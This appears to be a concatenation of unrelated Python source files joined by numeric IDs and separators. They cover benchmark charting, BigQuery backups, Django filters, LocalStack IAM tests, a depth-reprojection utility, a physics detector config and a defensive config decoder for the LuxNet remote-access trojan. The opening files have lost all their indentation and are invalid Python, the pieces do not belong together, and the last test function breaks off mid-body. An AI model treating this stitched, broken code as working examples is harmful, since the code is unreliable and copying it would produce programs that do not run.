chart.y_title = 'Time'
for name, rev2point in self.data.iteritems():
points = [rev2point.get(rev) for rev in self.all_revisions]
chart.add(name, points)
#
#
# XXX: the old list benchmarks were so slow that make the Y axis of
# this benchmark so compressed that it's impossible to spot
# variations. So, we manually set the range to something which is
# "reasonable" at the time of writing :(
if self.title == 'Constructors [CPython]':
self.max = 0.027
# try to compute a reasonable Y scale;
chart.min_scale = 10 # make sure to have 10 horizontal bands
estimate_max = self.min*2 # min+10% will cross one horizontal band
estimate_max = max(self.max, estimate_max)
if estimate_max != float('inf'):
chart.range = [0, estimate_max]
return chart
def display(chart):
# for development
if isinstance(chart, GroupedBarChart):
chart = chart.build()
chart.render_to_png('/tmp/chart.png')
os.system('feh /tmp/chart.png')
class PyQuery(list):
"""
Extend a list with an API which is vaguely inspired by jQuery to filter
and interact with the data.
"""
def filter(self, predicate):
new_items = [item for item in self if predicate(item)]
return self.__class__(new_items)
def getattr(self, attr, strict=False):
getter = operator.attrgetter(attr)
new_items = []
for item in self:
try:
new_items.append(getter(item))
except (AttributeError, KeyError):
if strict:
raise
pass
return self.__class__(new_items)
def __getattr__(self, attr):
return self.getattr(attr, strict=True)
def __call__(self, *args, **kwds):
return self.__class__([item(*args, **kwds) for item in self])
def pp(self):
from pprint import pprint
for item in self:
if isinstance(item, DotMap):
item.pprint()
else:
pprint(item)
class Charter(object):
"""
Chart-maker --> Charter :)
"""
def __init__(self, dir, revision):
self.dir = dir
self.revision = revision
self.clone_maybe()
self.load_all()
def clone_maybe(self):
# clone the .benchmarks repo, if it's needed
if self.dir.check(exists=False):
print 'Cloning the benchmarks repo'
url = getoutput('git config remote.origin.url')
cmd = 'git clone --depth=1 --branch=benchmarks {url} {dir}'
ret = os.system(cmd.format(url=url, dir=self.dir))
assert ret == 0
def files_to_load(self, limit):
result = []
for subdir in self.dir.listdir():
if subdir.check(dir=False):
continue
files = sorted(subdir.listdir('*.json'))
result += files[-limit:]
return result
def load_all(self, limit=50):
        # load all benchmarks. We only take the latest 50 because otherwise the
        # charts are too dense and the readthedocs build times out
self.all = PyQuery()
for f in self.files_to_load(limit):
self.all += self.load_one(f)
#
# filter a subset containing only the results for the current revision
self.latest_warning = None
self.latest = self.all.filter(
lambda b: b.info.commit_info.id == self.revision)
if not self.latest:
self.latest_warning = ('WARNING: rev %s not found, using latest '
'data' % self.revision[:6])
print self.latest_warning
# no benchmarks found for the current revision. This is likely to
# happen on the development machine; in this case, we simply take
# the newest benchmarks, regardless of the revision
self.latest = PyQuery()
all_impls = set(self.all.info.machine_info.python_implementation)
for impl in all_impls:
subset = self.all.filter(
lambda b: b.info.machine_info.python_implementation == impl)
newest_datetime = max(subset.info.datetime)
self.latest += subset.filter(
lambda b: b.info.datetime == newest_datetime)
@classmethod
def load_one(cls, f):
s = f.read()
if s == '':
return []
d = json.loads(s)
info = DotMap(d, _dynamic=False)
#
# reverse the relationship between info and benchmarks: each benchmark
        # has a pointer to the info (which no longer has a list of benchmarks)
benchmarks = info.pop('benchmarks')
for b in benchmarks:
b.filename = str(f)
b.info = info
# just a shortcut
b.python_implementation = b.info.machine_info.python_implementation
return benchmarks
@classmethod
def extract_test_name(cls, name):
m = re.match(r'test_([^\[]+)(\[.*\])?', name)
assert m
return m.group(1)
def get_chart(self, timeline, benchmarks, title, filter, series, group):
benchmarks = benchmarks.filter(filter)
if timeline:
# XXX: sort the values
# XXX: check that the CPU is always the same
chart = TimelineChart(title)
else:
chart = GroupedBarChart(title)
#
for b in benchmarks:
b.__displayed__ = True
series_name = series(b)
group_name = group(b)
chart.add(series_name, group_name, b)
chart = chart.build()
if self.latest_warning and not timeline:
chart.x_title = self.latest_warning
return chart
def run_directive(self, title, options, content):
namespace = {'charter': self}
if content:
src = py.code.Source('\n'.join(content))
exec src.compile() in namespace
#
def get_function(name):
src = 'lambda b: ' + options.get(name, 'None')
return eval(src, namespace)
#
timeline = 'timeline' in options
benchmarks = self.all if timeline else self.latest
#
# split the benchmarks into various group by using the foreach key
foreach = get_function('foreach')
d = defaultdict(PyQuery)
for b in benchmarks:
key = foreach(b)
d[key].append(b)
#
# generate a chart for each "foreach" group
res = []
for key in sorted(d):
benchmarks = d[key]
newtitle = title
if key:
newtitle += ' [%s]' % key
chart = self.get_chart(
timeline = timeline,
benchmarks = benchmarks,
title = newtitle,
filter = get_function('filter'),
series = get_function('series'),
group = get_function('group'))
res.append(chart)
return res
|
1708488
|
import logging
from src.commons.big_query.big_query_table_metadata import BigQueryTableMetadata
class SLIBackupTableNotSeenByCensusPredicate(object):
def __init__(self, big_query, query_specification):
self.big_query = big_query
self.query_specification = query_specification
def is_not_seen_by_census(self, sli_table):
backup_table_reference = self.query_specification.to_backup_table_reference(sli_table)
backup_table_metadata = BigQueryTableMetadata(
self.big_query.get_table(
project_id=backup_table_reference.project_id,
dataset_id=backup_table_reference.dataset_id,
table_id=backup_table_reference.table_id)
)
if not backup_table_metadata.table_exists():
logging.info("Backup table doesn't exist: %s",
backup_table_reference)
return False
if not sli_table['backupLastModifiedTime']:
if backup_table_metadata.table_size_in_bytes() == sli_table['backupEntityNumBytes']:
logging.info(
"Backup table: %s exists although Census doesn't see it yet. "
"Backup table have the same number of bytes as saved in datastore.",
backup_table_reference)
return True
return False
|
1708503
|
import sys
class MuninGraph(object):
def run(self):
cmd_name = None
if len(sys.argv) > 1:
cmd_name = sys.argv[1]
if cmd_name == 'config':
self.print_config()
else:
metrics = self.calculate_metrics()
self.print_metrics(metrics)
def print_config(self):
for key,value in self.graph_config.items():
print('%s %s' % (key, value))
def print_metrics(self, metrics):
for key, value in metrics.items():
print('%s.value %s' % (key, value))
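# Illustrative sketch (not part of the original module): a concrete plugin is
# expected to provide `graph_config` and `calculate_metrics()`; `run()` then
# prints either the config or the metric values depending on sys.argv.
class ExampleLoadGraph(MuninGraph):
    graph_config = {
        'graph_title': 'Example load',
        'graph_vlabel': 'load',
    }
    def calculate_metrics(self):
        # hypothetical constant metric, only to show the expected return shape
        return {'load': 0.42}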
|
1708504
|
from .folder import ImageFolder, DatasetFolder
from .vision import VisionDataset
__all__ = ('ImageFolder', 'DatasetFolder', 'VisionDataset')
|
1708527
|
import rest_framework_filters as filters
from metaci.build.models import Build
from metaci.build.models import BuildFlow
from metaci.build.models import Rebuild
from metaci.cumulusci.filters import OrgRelatedFilter
from metaci.cumulusci.filters import ScratchOrgInstanceRelatedFilter
from metaci.cumulusci.models import Org
from metaci.cumulusci.models import ScratchOrgInstance
from metaci.plan.filters import PlanRelatedFilter
from metaci.plan.models import Plan
from metaci.repository.filters import BranchRelatedFilter
from metaci.repository.filters import RepositoryRelatedFilter
from metaci.repository.models import Branch
from metaci.repository.models import Repository
class BuildRelatedFilter(filters.FilterSet):
branch = filters.RelatedFilter(
BranchRelatedFilter,
field_name='branch',
queryset=Branch.objects.all()
)
org = filters.RelatedFilter(
OrgRelatedFilter,
field_name='org',
queryset=Org.objects.all()
)
plan = filters.RelatedFilter(
PlanRelatedFilter,
field_name='plan',
queryset=Plan.objects.all()
)
repo = filters.RelatedFilter(
RepositoryRelatedFilter,
field_name='repo',
queryset=Repository.objects.all()
)
class Meta:
model = Build
fields = {
'commit': ['exact'],
'status': ['exact'],
'time_queue': ['gt','lt'],
'time_start': ['gt','lt'],
'time_end': ['gt','lt'],
}
class BuildFilter(BuildRelatedFilter):
pass
class RebuildRelatedFilter(filters.FilterSet):
build = filters.RelatedFilter(
BuildRelatedFilter,
        field_name='build',
queryset=Build.objects.all()
)
class Meta:
model = Rebuild
fields = {
'status': ['exact'],
'time_queue': ['gt','lt'],
'time_start': ['gt','lt'],
'time_end': ['gt','lt'],
}
class RebuildFilter(RebuildRelatedFilter):
pass
class BuildFlowRelatedFilter(filters.FilterSet):
build = filters.RelatedFilter(
BuildRelatedFilter,
field_name='build',
queryset=Build.objects.all()
)
rebuild = filters.RelatedFilter(
RebuildRelatedFilter,
field_name='build',
queryset=Rebuild.objects.all()
)
class Meta:
model = BuildFlow
fields = {
'status': ['exact'],
'time_queue': ['gt','lt'],
'time_start': ['gt','lt'],
'time_end': ['gt','lt'],
}
class BuildFlowFilter(BuildFlowRelatedFilter):
pass
|
1708533
|
import quiver
import torch
world_size = torch.cuda.device_count()
device_list = list(range(world_size))
numa_topo = quiver.NumaTopo(device_list)
numa_topo.info()
|
1708545
|
import argparse
import os
import librosa
from utils.utils import calc_snr, calc_lsd
from generating import AudioGenerator
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_folder', help='Folder of trained model', type=str, required=True)
parser.add_argument('--lr_signal', help='Name of signal to perform bandwidth extension on', type=str, required=True)
parser.add_argument('--filter_file',
help='Text file describing the anti-aliasing filter frequency response used for downsampling',
type=str, default=None)
args = parser.parse_args()
file_name = args.lr_signal.split('.')
audio_generator = AudioGenerator(os.path.join('outputs', args.input_folder))
if len(file_name) < 2:
args.lr_signal = '.'.join([args.lr_signal, 'wav'])
lr_signal, condition_fs = librosa.load(os.path.join('inputs', args.lr_signal), sr=None)
norm_factor = abs(lr_signal).max()
lr_signal = lr_signal / norm_factor
condition = {'condition_signal': lr_signal, 'condition_fs': condition_fs, 'name': args.lr_signal.split('.')[0]}
filter_file = None if args.filter_file is None else os.path.join('inputs', args.filter_file + '.txt')
extended_signal = audio_generator.extend(condition, filter_file)
    # If a high-resolution signal exists, use it to calculate the SNR and LSD of the extended signal
if os.path.exists(os.path.join('inputs', args.lr_signal.replace('_lr', '_hr'))):
hr_signal, hr_fs = librosa.load(os.path.join('inputs', args.lr_signal.replace('_lr', '_hr')),
sr=audio_generator.params.Fs)
        # The model works on normalized signals, so we normalize the ground truth as well for the SNR calculation.
        # You may instead multiply extended_signal by norm_factor to return to the original amplitudes.
hr_signal = hr_signal / norm_factor
snr = calc_snr(extended_signal, hr_signal)
lsd = calc_lsd(extended_signal, hr_signal)
print('SNR: %.2f[dB], LSD: %.2f\n' % (snr, lsd))
|
1708557
|
from os import mkdir
from shutil import copy2, rmtree
from os.path import basename, join
from json import load, dumps
from file_handler import read_data
from generator import get_dim
def start(event_name, template, csv):
try:
mkdir("UI/temp")
except:
pass
for x in [(template, basename(template)), (csv, basename(csv))]:
try:
copy2(x[0], join("UI/temp", x[1]))
except:
pass
with open(join("UI/temp", "dsc-cert-gen.json"), "w") as f:
f.write(dumps({"event_name": event_name, "template": join("temp", basename(template)), "csv": join("UI/temp", basename(csv))}))
def saveEditor(trans):
with open(join("UI/temp", "dsc-cert-gen.json")) as f:
j = load(f)
j["data"] = trans
with open(join("UI/temp", "dsc-cert-gen.json"), "w") as f:
f.write(dumps(j))
def loadEditor():
with open(join("UI/temp", "dsc-cert-gen.json")) as f:
j = load(f)
j["width"], j["height"] = get_dim(join("UI", j["template"]))
j["template_base"] = basename(j["template"])
j["csv_base"] = basename(j["csv"])
return j
def loadOptions():
with open(join("UI/temp", "dsc-cert-gen.json")) as f:
j = load(f)
event_name = j["event_name"]
cols = read_data(j["csv"], only_cols=True)
html = ""
    for i, col in enumerate(cols):
        html += '<option value="{}">{}</option>'.format(i, col)
return [event_name, html]
def cleanup():
rmtree("UI/temp")
|
1708563
|
import jinja2
from localstack.utils.common import short_uid
from localstack.utils.generic.wait_utils import wait_until
from tests.integration.cloudformation.test_cloudformation_changesets import load_template_raw
def test_delete_role_detaches_role_policy(
cfn_client,
iam_client,
cleanup_stacks,
cleanup_changesets,
is_change_set_created_and_available,
is_stack_created,
):
stack_name = f"stack-{short_uid()}"
change_set_name = f"change-set-{short_uid()}"
role_name = f"LsRole{short_uid()}"
policy_name = f"LsPolicy{short_uid()}"
template_rendered = jinja2.Template(load_template_raw("iam_role_policy.yaml")).render(
role_name=role_name,
policy_name=policy_name,
include_policy=True,
)
response = cfn_client.create_change_set(
StackName=stack_name,
ChangeSetName=change_set_name,
TemplateBody=template_rendered,
ChangeSetType="CREATE",
)
change_set_id = response["Id"]
stack_id = response["StackId"]
try:
wait_until(is_change_set_created_and_available(change_set_id))
cfn_client.execute_change_set(ChangeSetName=change_set_id)
wait_until(is_stack_created(stack_id))
attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)[
"AttachedPolicies"
]
assert len(attached_policies) > 0
# nopolicy_template = jinja2.Template(load_template_raw("iam_role_policy.yaml")).render(
# role_name=role_name,
# policy_name=policy_name,
# include_policy=False,
# )
# nopolicy_changeset_name = f"change-set-{short_uid()}"
# response = cfn_client.create_change_set(
# StackName=stack_name,
# ChangeSetName=nopolicy_changeset_name,
# TemplateBody=nopolicy_template,
# ChangeSetType="UPDATE",
# )
# change_set_id = response["Id"]
# wait_until(is_change_set_created_and_available(change_set_id))
# cfn_client.execute_change_set(ChangeSetName=change_set_id)
# time.sleep(5)
# wait_until(is_stack_created(stack_id)) # TODO: wrong format
# wait_until(is_stack_deleted(stack_id))
# TODO: need to update stack to delete only a single resource
# attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)['AttachedPolicies']
# assert len(attached_policies) == 0
finally:
cleanup_changesets([change_set_id])
cleanup_stacks([stack_id])
def test_policy_attachments(
cfn_client,
iam_client,
cleanup_stacks,
cleanup_changesets,
is_change_set_created_and_available,
is_stack_created,
):
stack_name = f"stack-{short_uid()}"
change_set_name = f"change-set-{short_uid()}"
role_name = f"role-{short_uid()}"
group_name = f"group-{short_uid()}"
user_name = f"user-{short_uid()}"
policy_name = f"policy-{short_uid()}"
template_rendered = jinja2.Template(load_template_raw("iam_policy_attachments.yaml")).render(
role_name=role_name,
policy_name=policy_name,
user_name=user_name,
group_name=group_name,
)
response = cfn_client.create_change_set(
StackName=stack_name,
ChangeSetName=change_set_name,
TemplateBody=template_rendered,
ChangeSetType="CREATE",
)
change_set_id = response["Id"]
stack_id = response["StackId"]
try:
wait_until(is_change_set_created_and_available(change_set_id))
cfn_client.execute_change_set(ChangeSetName=change_set_id)
wait_until(is_stack_created(stack_id))
# check inline policies
role_inline_policies = iam_client.list_role_policies(RoleName=role_name)
user_inline_policies = iam_client.list_user_policies(UserName=user_name)
group_inline_policies = iam_client.list_group_policies(GroupName=group_name)
assert len(role_inline_policies["PolicyNames"]) == 1
assert len(user_inline_policies["PolicyNames"]) == 1
assert len(group_inline_policies["PolicyNames"]) == 1
# check managed/attached policies
role_attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)
user_attached_policies = iam_client.list_attached_user_policies(UserName=user_name)
group_attached_policies = iam_client.list_attached_group_policies(GroupName=group_name)
assert len(role_attached_policies["AttachedPolicies"]) == 1
assert len(user_attached_policies["AttachedPolicies"]) == 1
assert len(group_attached_policies["AttachedPolicies"]) == 1
finally:
cleanup_changesets([change_set_id])
cleanup_stacks([stack_id])
|
1708599
|
from malwareconfig.common import Decoder
from malwareconfig.common import string_printable
class LuxNet(Decoder):
decoder_name = "LuxNet"
    decoder_version = 1
decoder_author = "@kevthehermit"
decoder_description = "Luxnet RAT Decoder"
def __init__(self):
self.config = {}
def get_config(self):
'''
This is the main entry
:return:
'''
config_dict = {}
user_strings = self.file_info.dotnet_user_strings()
base_location = user_strings.index("SocketException")
config_dict['domain'] = user_strings[base_location-2]
config_dict['port'] = user_strings[base_location-1]
# Set the config to the class for use
self.config = config_dict
|
1708617
|
import numpy as np
class NetworkInput(object):
def __init__(self, path, input_shape, num_labels):
self.path = path
self.num_labels = num_labels
self.batch_start = 0
self.epochs_completed = 0
self.input_shape = input_shape
self.cache = np.array([])
self.cache_iterator = 0
self.cache_factor = 10
def next_batch(self, batch_size):
        raise NotImplementedError
def create_label_vector(self, label):
v = np.zeros(self.num_labels)
v[label] = 1
return v
def next_batch_cached(self, batch_size):
if self.cache_iterator == 0:
self.cache = self.next_batch(batch_size * self.cache_factor)
result_images = self.cache[0][self.cache_iterator * batch_size : (self.cache_iterator+1) * batch_size]
result_labels = self.cache[1][self.cache_iterator * batch_size : (self.cache_iterator+1) * batch_size]
self.cache_iterator = (self.cache_iterator + 1) % self.cache_factor
return result_images, result_labels
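# Illustrative sketch (an assumption about intended use, not from the original code):
# a concrete input source only needs to implement next_batch(); next_batch_cached()
# then amortizes loading by fetching cache_factor batches at once and slicing them.
#
#   class RandomInput(NetworkInput):
#       def next_batch(self, batch_size):
#           images = np.random.rand(batch_size, *self.input_shape)
#           labels = np.array([self.create_label_vector(i % self.num_labels)
#                              for i in range(batch_size)])
#           return images, labels
#
#   inp = RandomInput(path=None, input_shape=(28, 28), num_labels=10)
#   images, labels = inp.next_batch_cached(32)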
|
1708670
|
from torchvision.transforms.functional import InterpolationMode
import os
from PIL import Image
import numpy as np
from collections import OrderedDict
from tqdm.auto import tqdm
import torchvision
import torch
def to_numpy(x):
x_ = np.array(x)
x_ = x_.astype(np.float32)
return x_
def get_image_transform(transform):
# fix for this issue: https://github.com/pytorch/vision/issues/2194
    if transform is not None and isinstance(transform, torchvision.transforms.Compose) and isinstance(transform.transforms[-1], torchvision.transforms.ToTensor):
transform = torchvision.transforms.Compose([
*transform.transforms[:-1],
torchvision.transforms.Lambda(to_numpy),
torchvision.transforms.ToTensor()
])
elif isinstance(transform, torchvision.transforms.ToTensor):
transform = torchvision.transforms.Compose([
torchvision.transforms.Lambda(to_numpy),
torchvision.transforms.ToTensor()
])
return transform
def unproject(cam2world, intrinsic, depth):
# get dimensions
bs, _, H, W = depth.shape
# create meshgrid with image dimensions (== pixel coordinates of source image)
y = torch.linspace(0, H - 1, H).type_as(depth).int()
x = torch.linspace(0, W - 1, W).type_as(depth).int()
xx, yy = torch.meshgrid(x, y)
xx = torch.transpose(xx, 0, 1).repeat(bs, 1, 1)
yy = torch.transpose(yy, 0, 1).repeat(bs, 1, 1)
# get intrinsics and depth in correct format to match image dimensions
fx = intrinsic[:, 0, 0].unsqueeze(1).unsqueeze(1).expand_as(xx)
cx = intrinsic[:, 0, 2].unsqueeze(1).unsqueeze(1).expand_as(xx)
fy = intrinsic[:, 1, 1].unsqueeze(1).unsqueeze(1).expand_as(yy)
cy = intrinsic[:, 1, 2].unsqueeze(1).unsqueeze(1).expand_as(yy)
depth = depth.squeeze()
# inverse projection (K_inv) on pixel coordinates --> 3D point-cloud
x = (xx - cx) / fx * depth
y = (yy - cy) / fy * depth
# combine each point into an (x,y,z,1) vector
coords = torch.zeros(bs, H, W, 4).type_as(depth).float()
coords[:, :, :, 0] = x
coords[:, :, :, 1] = y
coords[:, :, :, 2] = depth
coords[:, :, :, 3] = 1
# extrinsic view projection to target view
coords = coords.view(bs, -1, 4)
coords = torch.bmm(coords, cam2world)
coords = coords.view(bs, H, W, 4)
return coords
def reproject(cam2world_src, cam2world_tar, W, H, intrinsic, depth_src, depth_tar, color_tar, mask_tar):
# get batch_size
bs = mask_tar.shape[0]
# calculate src2tar extrinsic matrix
world2cam_tar = torch.inverse(cam2world_tar)
src2tar = torch.transpose(torch.bmm(world2cam_tar, cam2world_src), 1, 2)
# create meshgrid with image dimensions (== pixel coordinates of source image)
y = torch.linspace(0, H - 1, H).type_as(color_tar).int()
x = torch.linspace(0, W - 1, W).type_as(color_tar).int()
xx, yy = torch.meshgrid(x, y)
xx = torch.transpose(xx, 0, 1).repeat(bs, 1, 1)
yy = torch.transpose(yy, 0, 1).repeat(bs, 1, 1)
# get intrinsics and depth in correct format to match image dimensions
fx = intrinsic[:,0,0].unsqueeze(1).unsqueeze(1).expand_as(xx)
cx = intrinsic[:,0,2].unsqueeze(1).unsqueeze(1).expand_as(xx)
fy = intrinsic[:,1,1].unsqueeze(1).unsqueeze(1).expand_as(yy)
cy = intrinsic[:,1,2].unsqueeze(1).unsqueeze(1).expand_as(yy)
depth_src = depth_src.squeeze()
# inverse projection (K_inv) on pixel coordinates --> 3D point-cloud
x = (xx - cx) / fx * depth_src
y = (yy - cy) / fy * depth_src
# combine each point into an (x,y,z,1) vector
coords = torch.zeros(bs, H, W, 4).type_as(color_tar).float()
coords[:, :, :, 0] = x
coords[:, :, :, 1] = y
coords[:, :, :, 2] = depth_src
coords[:, :, :, 3] = 1
# extrinsic view projection to target view
coords = coords.view(bs, -1, 4)
coords = torch.bmm(coords, src2tar)
coords = coords.view(bs, H, W, 4)
# projection (K) on 3D point-cloud --> pixel coordinates
z_tar = coords[:, :, :, 2]
x = coords[:, :, :, 0] / (1e-8 + z_tar) * fx + cx
y = coords[:, :, :, 1] / (1e-8 + z_tar) * fy + cy
# mask invalid pixel coordinates because of invalid source depth
mask0 = (depth_src == 0)
# mask invalid pixel coordinates after projection:
# these coordinates are not visible in target view (out of screen bounds)
mask1 = (x < 0) + (y < 0) + (x >= W - 1) + (y >= H - 1)
# create 4 target pixel coordinates which map to the nearest integer coordinate
# (left, top, right, bottom)
lx = torch.floor(x).float()
ly = torch.floor(y).float()
rx = (lx + 1).float()
ry = (ly + 1).float()
def make_grid(x, y):
"""
converts pixel coordinates from [0..W] or [0..H] to [-1..1] and stacks them together.
:param x: x pixel coordinates with shape NxHxW
:param y: y pixel coordinates with shape NxHxW
:return: (x,y) pixel coordinate grid with shape NxHxWx2
"""
x = (2.0 * x / W) - 1.0
y = (2.0 * y / H) - 1.0
grid = torch.stack((x, y), dim=3)
return grid
# combine to (x,y) pixel coordinates: (top-left, ..., bottom-right)
ll = make_grid(lx, ly)
lr = make_grid(lx, ry)
rl = make_grid(rx, ly)
rr = make_grid(rx, ry)
# calculate difference between depth in target view after reprojection and gt depth in target view
z_tar = z_tar.unsqueeze(1)
sample_z1 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, ll,
mode="nearest",
padding_mode='border',
align_corners=True))
sample_z2 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, lr,
mode="nearest",
padding_mode='border',
align_corners=True))
sample_z3 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, rl,
mode="nearest",
padding_mode='border',
align_corners=True))
sample_z4 = torch.abs(z_tar - torch.nn.functional.grid_sample(depth_tar, rr,
mode="nearest",
padding_mode='border',
align_corners=True))
# mask invalid pixel coordinates because of too high difference in depth
mask2 = torch.minimum(torch.minimum(sample_z1, sample_z2), torch.minimum(sample_z3, sample_z4)) > 0.1
mask2 = mask2.int().squeeze()
# combine all masks
mask_remap = (1 - (mask0 + mask1 + mask2 > 0).int()).float().unsqueeze(1)
# create (x,y) pixel coordinate grid with reprojected float coordinates
map_x = x.float()
map_y = y.float()
map = make_grid(map_x, map_y)
# warp target rgb/mask to the new pixel coordinates based on the reprojection
# also mask the results
color_tar_to_src = torch.nn.functional.grid_sample(color_tar, map,
mode="bilinear",
padding_mode='border',
align_corners=True)
mask_tar = mask_tar.float().unsqueeze(1)
mask = torch.nn.functional.grid_sample(mask_tar, map,
mode="bilinear",
padding_mode='border',
align_corners=True)
mask = (mask > 0.99) * mask_remap
mask = mask.bool()
color_tar_to_src *= mask
return color_tar_to_src, mask.squeeze(1)
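# Illustrative shape sketch (assumed conventions, not from the original repository):
# both helpers operate on batched tensors.
#
#   bs, H, W = 2, 240, 320
#   depth = torch.rand(bs, 1, H, W)
#   intrinsic = torch.eye(3).repeat(bs, 1, 1)        # (bs, 3, 3) pinhole intrinsics
#   cam2world = torch.eye(4).repeat(bs, 1, 1)        # (bs, 4, 4) camera-to-world pose
#   points = unproject(cam2world, intrinsic, depth)  # (bs, H, W, 4) homogeneous points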
|
1708677
|
import FWCore.ParameterSet.Config as cms
from RecoEcal.EgammaClusterProducers.hybridSuperClusters_cfi import *
from RecoEcal.EgammaClusterProducers.multi5x5BasicClusters_cfi import *
EleIsoEcalFromHitsExtractorBlock = cms.PSet(
ComponentName = cms.string('EgammaRecHitExtractor'),
DepositLabel = cms.untracked.string(''),
isolationVariable = cms.string('et'),
extRadius = cms.double(0.6),
intRadius = cms.double(0.0),
intStrip = cms.double(0.0),
etMin = cms.double(0.0),
energyMin = cms.double(0.095),
subtractSuperClusterEnergy = cms.bool(False),
tryBoth = cms.bool(True),
vetoClustered = cms.bool(False),
barrelEcalHits = cms.InputTag("ecalRecHit","EcalRecHitsEB"),
endcapEcalHits = cms.InputTag("ecalRecHit","EcalRecHitsEE"),
RecHitFlagToBeExcludedEB = cleanedHybridSuperClusters.RecHitFlagToBeExcluded,
RecHitSeverityToBeExcludedEB = cleanedHybridSuperClusters.RecHitSeverityToBeExcluded,
RecHitFlagToBeExcludedEE = multi5x5BasicClustersCleaned.RecHitFlagToBeExcluded,
RecHitSeverityToBeExcludedEE = cleanedHybridSuperClusters.RecHitSeverityToBeExcluded
#severityLevelCut = cms.int32(4),
# severityRecHitThreshold = cms.double(5.0),
# spikeIdString = cms.string('kSwissCrossBordersIncluded'),
# spikeIdThreshold = cms.double(0.95),
# recHitFlagsToBeExcluded = cms.vstring(
# 'kFaultyHardware',
# 'kPoorCalib',
# ecalRecHitFlag_kSaturated,
# ecalRecHitFlag_kLeadingEdgeRecovered,
# ecalRecHitFlag_kNeighboursRecovered,
# 'kTowerRecovered',
# 'kDead'
# ),
)
|
1708692
|
import os
import sys
import numpy as np
from .config import config
class Model:
def __init__(self, n_feature, n_tag):
self.n_tag = n_tag
self.n_feature = n_feature
self.n_transition_feature = n_tag * (n_feature + n_tag)
if config.random:
self.w = np.random.random(size=(self.n_transition_feature,)) * 2 - 1
else:
self.w = np.zeros(self.n_transition_feature)
def expand(self, n_feature, n_tag):
new_transition_feature = n_tag * (n_feature + n_tag)
if config.random:
new_w = np.random.random(size=(new_transition_feature,)) * 2 - 1
else:
new_w = np.zeros(new_transition_feature)
n_node = self.n_tag * self.n_feature
n_edge = self.n_tag * self.n_tag
new_w[:n_node] = self.w[:n_node]
new_w[-n_edge:] = self.w[-n_edge:]
self.n_tag = n_tag
self.n_feature = n_feature
self.n_transition_feature = new_transition_feature
self.w = new_w
def _get_node_tag_feature_id(self, feature_id, tag_id):
return feature_id * self.n_tag + tag_id
def _get_tag_tag_feature_id(self, pre_tag_id, tag_id):
return self.n_feature * self.n_tag + tag_id * self.n_tag + pre_tag_id
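    # Worked example (illustrative numbers, not from the original code): with
    # n_feature=10 and n_tag=4 the weight vector has 4 * (10 + 4) = 56 entries.
    # A node feature (feature_id=2, tag_id=1) maps to index 2 * 4 + 1 = 9, while a
    # transition (pre_tag_id=3, tag_id=2) maps to 10 * 4 + 2 * 4 + 3 = 51, i.e. the
    # transition weights occupy the last n_tag * n_tag slots of w.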
@classmethod
def load(cls, model_dir=None):
if model_dir is None:
model_dir = config.modelDir
model_path = os.path.join(model_dir, "weights.npz")
if os.path.exists(model_path):
npz = np.load(model_path)
sizes = npz["sizes"]
w = npz["w"]
model = cls.__new__(cls)
model.n_tag = int(sizes[0])
model.n_feature = int(sizes[1])
model.n_transition_feature = model.n_tag * (
model.n_feature + model.n_tag
)
model.w = w
assert model.w.shape[0] == model.n_transition_feature
return model
print(
"WARNING: weights.npz does not exist, try loading using old format",
file=sys.stderr,
)
model_path = os.path.join(model_dir, "model.txt")
with open(model_path, encoding="utf-8") as f:
ary = f.readlines()
model = cls.__new__(cls)
model.n_tag = int(ary[0].strip())
wsize = int(ary[1].strip())
w = np.zeros(wsize)
        for i in range(2, wsize + 2):
w[i - 2] = float(ary[i].strip())
model.w = w
model.n_feature = wsize // model.n_tag - model.n_tag
model.n_transition_feature = wsize
model.save(model_dir)
return model
@classmethod
def new(cls, model, copy_weight=True):
new_model = cls.__new__(cls)
new_model.n_tag = model.n_tag
if copy_weight:
new_model.w = model.w.copy()
else:
new_model.w = np.zeros_like(model.w)
new_model.n_feature = (
new_model.w.shape[0] // new_model.n_tag - new_model.n_tag
)
new_model.n_transition_feature = new_model.w.shape[0]
return new_model
def save(self, model_dir=None):
if model_dir is None:
model_dir = config.modelDir
sizes = np.array([self.n_tag, self.n_feature])
np.savez(
os.path.join(model_dir, "weights.npz"), sizes=sizes, w=self.w
)
# np.save
# with open(file, "w", encoding="utf-8") as f:
# f.write("{}\n{}\n".format(self.n_tag, self.w.shape[0]))
# for value in self.w:
# f.write("{:.4f}\n".format(value))
|
1708700
|
import unittest
import subprocess
class TestJupyterNbconvert(unittest.TestCase):
def test_nbconvert(self):
result = subprocess.run([
'jupyter',
'nbconvert',
'--to',
'notebook',
'--template',
'/opt/kaggle/nbconvert-extensions.tpl',
'--execute',
'--stdout',
'/input/tests/data/notebook.ipynb',
], stdout=subprocess.PIPE)
self.assertEqual(0, result.returncode)
self.assertTrue(b'999' in result.stdout)
|
1708709
|
def my_function(a, b):
return a + b
functions = [my_function]
print(functions[0])
print(functions[0](1, 2))
|
1708722
|
import unittest
from media_management_scripts.convert import convert_config_from_ns, convert_with_config, combine
from media_management_scripts.support.combine_all import combine_all, get_combinable_files
from tests import create_test_video, VideoDefinition, AudioDefition, AudioCodec, AudioChannelName
from tempfile import NamedTemporaryFile, TemporaryDirectory
from media_management_scripts.utils import extract_metadata, ConvertConfig
import os
SRT_TEXT = """
1
00:01:16,820 --> 00:01:19,660
This is the first piece.
2
00:01:19,740 --> 00:01:22,700
This is another piece.
"""
class CombineTestCase(unittest.TestCase):
def _validate_file(self, filename, lang='eng'):
metadata = extract_metadata(filename)
self.assertEqual(1, len(metadata.video_streams))
self.assertEqual(1, len(metadata.audio_streams))
self.assertEqual(1, len(metadata.subtitle_streams))
self.assertEqual(lang, metadata.subtitle_streams[0].language)
def test_basic_combine(self):
with create_test_video(length=3) as file, \
NamedTemporaryFile(suffix='.srt', mode='w') as srt_file, \
NamedTemporaryFile(suffix='.mkv') as out:
srt_file.file.write(SRT_TEXT)
srt_file.file.flush()
ret = combine(file.name, srt_file.name, output=out.name, lang='eng', overwrite=True)
self.assertEqual(0, ret)
self._validate_file(out.name)
def test_get_combinable_files(self):
with TemporaryDirectory() as input_dir, TemporaryDirectory() as output_dir:
file1 = os.path.join(input_dir, 'file1.mkv')
file2 = os.path.join(input_dir, 'file2.mkv')
file3 = os.path.join(input_dir, 'file3.mkv')
